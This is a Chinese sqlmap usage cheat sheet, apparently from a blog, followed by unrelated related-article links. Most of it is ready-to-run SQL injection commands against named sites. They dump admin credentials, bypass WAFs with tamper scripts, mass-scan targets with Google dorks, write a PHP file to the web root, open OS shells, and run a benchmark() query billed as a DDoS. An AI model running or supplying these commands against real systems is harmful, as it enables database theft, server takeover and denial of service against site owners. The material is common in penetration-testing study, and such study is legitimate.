一共有七个等级
0、只显示python错误以及严重的信息。
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息。
3、同时显示注入的payload。
4、同时显示HTTP请求。
5、同时显示HTTP响应头。
6、同时显示HTTP响应页面。

Mysql数据库注入
is-dba        当前用户权限
dbs            所有数据库
current-db        网站当前数据库
users            所有数据库用户
current-user    当前数据库用户
passwords         当前用户有权限读取包含用户密码的表的权限时,sqlmap会现列举出用户,然后列出hash,并尝试破解

Cookie注入
1.sqlmap -u "http://www.baidu.com/show.asp" --cookie "id=12" --level 2
2.sqlmap -u "http://www.baidu.com/show.asp" --tables --cookie "id=12" --level 2
3.sqlmap -u "http://www.baidu.com/show.asp" --columns -T "admin" --cookie "id=12" --level 2
4.sqlmap -u "http://www.baidu.com/show.asp" --dump -C "admin,password" -T "admin" --cookie "id=12" --level 2

Post注入
forms              自动获取post包
r            从本地获取结果post包
//注意看清提示键y,n,默认的键为大写
forms用法:
1.sqlmap -u "http://www.acyt.org/submit.php" --forms
2.sqlmap -u "http://www.acyt.org/submit.php" --forms --dbs
3.sqlmap -u "http://www.acyt.org/submit.php" --forms --tables -D "db"
参数r用法:
1.sqlmap -r post.txt
2.sqlmap -r post.txt --dbs
3.sqlmap -r post.txt --tables -D "db"
当请求是HTTPS的时候你需要配合这个--force-ssl参数来使用,或者你可以在Host头后门加上:443

伪静态注入
例:http://www.acty.org/view/id/40.html
sqlmap -u "http://www.acty.org/view/id/40*.html" //注意*的位置

用谷歌批量扫注入
sqlmap -g "site:baidu.com inurl:php?id="

Temper插件过waf
sqlmap -u "http://www.acyt.org/news.php?id=34" --check-waf --tamper="插件" //检测是否有waf,会显示
1.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --batch --tamper="插件" //等级3以上才能检测
2.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --dbs --batch --tamper="插件"
3.sqlmap -u "http://www.acyt.org/news.php?id=34" -v 3 --tables -D "db" --batch --tamper="插件"
batch         要求不对目标写入   //可以不加,最好加
tamper        使用干预脚本
check        检查URL

File参数写文件
条件:
1.权限为dba权限
2.magic_quotes_gpc设置为off

file-write              从本地写入
file-dest            写入目标路径

语句:
sqlmap -u "http://www.acyt.org/news.php?id=34" --file-write=D:/1.php --file-dest=C:/input/www/test.php   //file-write是本机的文件,file-dest为网站绝对路径,注意斜杠

os参数
前提是要有dba权限,有dba权限不一定能使用
cmd            执行cmd命令(win)
shell            执行当前用户命令
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-cmd="whoami"
sqlmap -u "http://www.acyt.org/news.php?id=34" --os-shell="whoami"
sqlmapDDoS攻击
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell
获得一个即时shell,执行
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

注入延时
sqlmap -u "http://www.acyt.org/news.php?id=34" --delay 0.5 //延时0.5秒
sqlmap -u "http://www.acyt.org/news.php?id=34" --dbs --delay 0.5
从Burp或者WebScarab代理中获取日志
sqlmap -l burp.log
sqlmap -l burp.log --dbs

执行sql语句
参数:--sql-query,--sql-shell
sqlmap -u "http://www.acyt.org/news.php?id=34" --sql-shell "sql语句"

暴力破解列名或表明
参数:--coomon-tables , --common-columns
sqlmap -u "http://www.acyt.org/news.php?id=34" --common-tables -D "db"
字典在txt文件夹下,可自定义

Sqlmap用法小结的更多相关文章

  1. 转载:Hadoop排序工具用法小结

    本文转载自Silhouette的文章,原文地址:http://www.dreamingfish123.info/?p=1102 Hadoop排序工具用法小结 发表于 2014 年 8 月 25 日 由 ...

  2. [No000010]Ruby 中一些百分号(%)的用法小结

    #Ruby 中一些百分号(%)的用法小结 #这篇文章主要介绍了Ruby 中一些百分号(%)的用法小结,需要的朋友可以参考下 what_frank_said = "Hello!"#% ...

  3. C++ typedef用法小结 (※不能不看※)

    C++ typedef用法小结 (※不能不看※) 第一.四个用途 用途一: 定义一种类型的别名,而不只是简单的宏替换.可以用作同时声明指针型的多个对象.比如:char* pa, pb; // 这多数不 ...

  4. 函数fgets和fputs、fread和fwrite、fscanf和fprintf用法小结 (转)

    函数fgets和fputs.fread和fwrite.fscanf和fprintf用法小结 字符串读写函数fgets和fputs 一.读字符串函数fgets函数的功能是从指定的文件中读一个字符串到字符 ...

  5. 1:CSS中一些@规则的用法小结 2: @media用法详解

    第一篇文章:@用法小结 第二篇文章:@media用法 第一篇文章:@用法小结 这篇文章主要介绍了CSS中一些@规则的用法小结,是CSS入门学习中的基础知识,需要的朋友可以参考下     at-rule ...

  6. 英语语法最终珍藏版笔记- 21it 用法小结

    it 用法小结 it 在英语中的意思较多,用法较广,现总结如下. 一.it作句子的真正主语 1.it 指前面已经提到过的人或事物,有时指心目中的或成为问题的人或事物,作真正主语. 例如: What’s ...

  7. [转]ssh常用用法小结

    ssh常用用法小结 1.连接到远程主机: 命令格式 : ssh name@remoteserver 或者 ssh remoteserver -l name 说明:以上两种方式都可以远程登录到远程主机, ...

  8. 结构体定义 typedef struct 用法详解和用法小结

    typedef是类型定义的意思.typedef struct 是为了使用这个结构体方便.具体区别在于:若struct node {}这样来定义结构体的话.在申请node 的变量时,需要这样写,stru ...

  9. typedef用法小结

    typedef用法小结- - 注意:本文转自网络,版权归原作者所有. typedef typedef用法小结- - 这两天在看程序的时候,发现很多地方都用到typedef,在结构体定义,还有一些数组等 ...

随机推荐

  1. [Err] 1449 - The user specified as a definer ('student'@'%') does not exist

    1.错误描述 [SQL]use student; 受影响的行: 0 时间: 0.001s [SQL] call alter_student('t_student','MODIFY COLUMN `we ...

  2. MPAndroidChart Wiki(译文)~Part 1

    1. 基础入门 1.1 添加依赖 Gradle 工程添加依赖 (推荐使用) 项目级build.gradle中添加: allprojects { repositories { maven { url & ...

  3. golang slice 与list 的性能分析。

    一 · 比较slice 与 list 遍历创建和添加元素速度. package main import ( "time" "fmt" "contain ...

  4. freeradius连接mysql数据库慢

    [环境说明] 服务器版本         redHat5.3 mysql版本         MySQL5.6.22 freeradius版本   2.1.12 [问题描述] 配置好freeradiu ...

  5. 设置checkbox不能选中,复选框不能选中

    Web开发:设置复选框的只读效果 在Web开发中,有时候需要显示一些复选框(checkbox),表明这个地方是可以进行勾选操作的,但是有时候是只想告知用户"这个地方是可以进行勾选操作的&qu ...

  6. 【angularJS】Service服务

    AngularJS 中的服务是一个函数或对象.可以创建自己的服务,或使用内建服务. 内置服务 AngularJS 内建了30 多个服务. 1.  $location 服务,它可以返回当前页面的 URL ...

  7. 让nodejs 支持 es6 import

    备注:    尽管nodejs 新版本已经支持es6 的好多特性了,但是还是有部分不支持,为了使用,实际上我们有一个 比较强大工具 bable,下面介绍几个比较简单的用法. 1. bable-cli ...

  8. chrome扩展程序开发之在目标页面执行自己的JS

    大家都知道JS是执行在client的.所以,假设我们自己写一个浏览器的话.是一定能够往下载下来的网页源码中加入js的.可惜我们没有这个能力.只是幸运的是,chrome的扩展程序能够帮我们做到这件事. ...

  9. bzoj 3158 千钧一发——网络流

    题目:https://www.lydsy.com/JudgeOnline/problem.php?id=3158 发现偶数之间一定满足第二个条件:奇数之间一定满足第一个条件 ( \( (2m+1)^{ ...

  10. 2.Python输入pip命令出现Unknown or unsupported command 'install'问题解决

    1.在学习python时,输入pip命令的时候出现以下错误: 2.原因:输入where pip命令查找,发现结果如下图,原因是因为电脑原先装了LoadRunner,导致系统无法识别应该使用哪一个pip ...